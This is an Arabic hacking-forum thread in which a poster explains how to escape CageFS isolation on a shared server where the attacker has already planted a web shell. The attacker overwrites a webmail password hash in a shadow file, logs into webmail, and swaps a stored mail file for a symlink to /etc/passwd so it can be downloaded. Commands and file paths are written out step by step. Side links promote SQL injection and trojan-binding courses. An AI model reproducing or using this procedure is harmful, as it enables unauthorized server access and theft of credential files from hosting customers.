1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] تخطي مشكلة القفص بالسيرفر

الموضوع في 'آمن المواقع والسيرفرات' بواسطة L I O N - T I G E R, بتاريخ ‏6 يوليو 2015.

كاتب الموضوع : L I O N - T I G E R المشاهدات : 2,572 الردود : 46 ‏6 يوليو 2015
حالة الموضوع:
مغلق
  1. غير متصل

    L I O N - T I G E R آداري أقسام البرامج

    عضو منذ:
    ‏25 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    356
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    [​IMG]
    بسم الله الرحمن الرحيم

    السسلآم علــيكم ورحمة الله وبركآته

    أخواني أصدقائي في شبكة عراق تيم

    بيت كل المطورين العرب يتجدد بنا اللقاء مرة اخرى

    غلى آمل طرح موضوع له فائد ولو بشيء بسيط
    [​IMG]
    اليوم بشرح لكم [ تخطي مشكلة القفص بالسيرفر ]

    أول شي : ماهو القفص ؟

    هو نظام يقوم بتركيبة الروت على السيرفر ليقوم بحجز الحسابات السيرفر ليصعب الحصول عليها .

    وبذالك تبقى المواقع كأنها وحيده بالسيرفر !!

    مثال :

    [​IMG]

    [​IMG]
    مثل مانشوف يوجد مجلدين الخاصه بالقفص

    نروح نتأكد ان حماية القفص مركبة بالسيرفر نقرا ملفات الباسوردات

    عن طريق أمر


    [CODEE]cat /etc/passwd[/CODEE]

    [​IMG]

    طيب الحين تأكدنا اننا نواجه مشكلة القفص

    نبدء عملية التخطي عن طريق الـ ***mail

    التراسلات تتم بالبريد في السيرفر وتروح على المسار

    كود PHP:
    /home/user/mail/new/
    أو على مسار الاخر

    كود PHP:
    /home/cods/mail/cur/
    تقدر تشوف محتوى الرسالة وتستطيع التعديل عليها

    طيب الحين كيف ندخل على برنامج ***mail

    نروح على مسار

    كود PHP:
    /home/user/etc/shadow
    أو على مسار الاخر

    كود PHP:
    /home/user/etc/domain.tld/shadow
    راح نشوف مثل كذا

    [​IMG]

    هذي اليوزرات هي الايميلات الخاصه فيه

    نروح ونعدل عليها ونستبدل هذا الباسورد وهو 123123

    كود PHP:
    $1$c5WCj0vT$pW/B8Jo3SKkcDsD1WrJtP0:16249::::::
    لازم نحط في البداية التشفيرة info يعني يكون بالشكل هذا

    كود PHP:
    info:$1$c5WCj0vT$pW/B8Jo3SKkcDsD1WrJtP0:16249::::::
    يصير مثل كذا

    [​IMG]

    [​IMG]
    طيب الحين ناخذ اسم الموقع الي حنا رافعين عليه شل ونحط بعده بورت 2095

    يكون بالشكل هذا

    كود PHP:
    www.xxxxxx.com:2095
    ويفتح معنا صفحة ***mail

    [​IMG]
    [​IMG]
    طيب ناخذ إسم الموقع ويكون بالشكل هذا

    كود PHP:
    info@xxxx.com
    ونحط الباسورد 123123 ويتم التسجيل بنجاح

    [​IMG]
    [​IMG]
    الحين شغلنا تمام

    ملاحظة بسيطة احيانا لمن تجي تدخل على roundcube

    يطلب منك يوزر وباسورد هذي تخطيها تروح على BoxTrapper

    تفتح معاك صفحة ويجيك تمكين وتعطيل انت عطلها

    خلها نفسك كذا

    [​IMG]
    [​IMG]
    طيب ندخل عليها مره ثانية وتفتح معنا بدون مشاكل

    بعدها نختار كلمة Compose ونسوي رسالة جديدة

    [​IMG]
    [​IMG]
    الإيميل موب شرط يكون صحيح خله وهمي وبعدها نسوي send

    وبعدها نختار كلمة sent

    [​IMG]
    [​IMG]
    الحين انتهينا من البرنامج نرجع الان لشل الي معنا ونروح على المسار التالي

    كود PHP:
    /home/cods/mail/cods.edu/usermail/.Sent/cur
    نشوف محتوى الرسالة الي ارسلناها

    [​IMG]
    [​IMG]
    تمام شغلنا مضبوط

    الحين ناخذ الاسم الطويل ننسخه وبعدها نحذفه

    [​IMG]

    بعد ماحذفناه نسوي سحب اختصار للباسوردات بنفس الاسم الطويل

    يكون نفس كذا

    كود PHP:
    ln -/etc/passwd 1429529493.M523647P590401.bh-20.***hostbox.net,S=337,W=349:2,S
    يصير نفس الشكل هذا

    [​IMG]
    [​IMG]
    لو تلاحظون على الدائرة انتج لنا ملف حجمه كبير

    الحين نرجع لبرنامج الـ ***mail ونشوف وش وصل لنا

    [​IMG]

    نشوف فيه تغير في الرسالة واصبح عندنا ملف حجمه كبير

    نضغط عليها وبعدها نتوجة على كلمة more ونضغط على كلمة

    Dowload (.eml)

    [​IMG]
    [​IMG]
    تم التخطي بعد عناء

    وفيه طريقة اخرى لفتح الملف تضغط على sent وبعدها تضغط دبل كلك مرتين

    [​IMG]

    [​IMG]
    والى هنا وصلنا لنهاية الشرح اتمنى اني وفقت فيه

    ان أصبت فمن الرحمن وإن اخطأت فمن الشيطان

    [​IMG]
    [​IMG]
     


    3 شخص معجب بهذا.
    جاري تحميل الصفحة...
  2. غير متصل

    ӎƦ.HmidE
    DeveloPer Plus

    عضو منذ:
    ‏9 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الوظيفة:
    .....
    الإقامة:

    رد: تخطي مشكلة القفص بالسيرفر

    موضوع متميز * .. !

    شكرا لك
    "
     


  3. غير متصل

    Crazy BoOoy
    rankrank
    Developer

    عضو منذ:
    ‏1 نوفمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    11
    نقاط الجائزة:
    الوظيفة:
    طالب
    الإقامة:

    رد: تخطي مشكلة القفص بالسيرفر

    وحش و الله .[​IMG].
    مو جديد عليك هالابداع .:{1}:.
     


  4. غير متصل

    J3eny
    rank
    Developer

    عضو منذ:
    ‏8 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تخطي مشكلة القفص بالسيرفر

    بصراح جميل جدا
    ابداع من شخص مبدع
    بارك الله بك
     


  5. غير متصل

    الأفعى
    rank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تخطي مشكلة القفص بالسيرفر

    يعطيك آلف عآفية حبيبي وآصل ,
    جآري الـ (++++++++++++++) آن أمكن !
     


  6. غير متصل

    الأفعى
    rank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تخطي مشكلة القفص بالسيرفر

    ماذا تعتقد في مشاركة l i o n - t i g e r؟ يعجبني ويستحق التقييم
     


  7. غير متصل

    -AL SenatoOoR-
    V • I • P

    عضو منذ:
    ‏14 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    41
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    رد: تخطي مشكلة القفص بالسيرفر

    ماشاء الله عليك
    مبدع يابطل
    وموضوع متعوب عليه
    يقصف بالخماسي +تقيم+{1!$7}
    {1!$8}​
     


  8. غير متصل

    Shдd0w
    rank
    Developer

    عضو منذ:
    ‏9 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    xXxXx
    الإقامة:

    رد: تخطي مشكلة القفص بالسيرفر

    تسلم حبيبي ..
     


  9. غير متصل

    k!lwa s&rian ro0t Expert
    طاقم الإدارة

    عضو منذ:
    ‏3 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,236
    نقاط الجائزة:
    الجنس:
    ذكر

    رد: تخطي مشكلة القفص بالسيرفر

    بارك الله فيك !

    فعلآ حماية وعرة وقوية !

    وتخطيها جميل منك ومشكور ياغالي

    الموضوع لازمه تثبيت من مشرفي القسم :$

    تستاهل تقييم !

    وتستاهل خمس نجوم + لايك للموضوع

    احترامي وتقديري لك
     


  10. غير متصل

    Zero-737
    Developer

    عضو منذ:
    ‏15 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: تخطي مشكلة القفص بالسيرفر

    الإبداع ليس غريبا عليك أخي
    بارك الله فيك
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...